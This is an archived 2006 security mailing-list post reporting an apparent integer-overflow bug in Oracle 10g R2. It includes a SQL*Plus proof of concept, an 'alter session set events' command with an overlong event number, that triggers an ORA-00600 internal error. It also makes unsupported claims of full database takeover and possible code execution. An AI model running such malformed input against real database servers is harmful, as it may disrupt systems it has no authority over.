Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Oracle 10g R2 and, probably, all previous versions

from [putosoft softputo] Network Security [Permanent Link]
Subject: Oracle 10g R2 and, probably, all previous versions
Date: Thu, 27 Jul 2006 19:23:41 +0000
I can't believe it. Oracle releases new patches and they have not been solved one of the main problems: A user with only the SELECT privilege can do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!!

I'm not sure if is time to full disclosure it but, anyway, I will "full disclosure" one inocent issue, an integer overflow:

Example:
--Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name context forever, level 16';

Session altered.

SQL> alter session set events '10046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004
61004610046100461004610046100461004610046100461004610046100461004610046100461004610046trace name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], []


It's not even a crash but (be sure) that there are other "combinations" that makes it vulnerable to integer overflows allowing the execution of arbritrary code.

PD: Hello Mary Ann! Are you on holidays?

_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine y TV... http://es.msn.kiwee.com/ Lo mejor para tu móvil.

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC), c0rrupt
Next by Date:  [Full-disclosure] rPSA-2006-0138-1 thunderbird, Justin M. Forbes
Previous by Thread:  AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC), c0rrupt
Next by Thread:  [Full-disclosure] chaseonline security, Geo.
Indexes:  [Date] [Thread] [Top] [All Lists]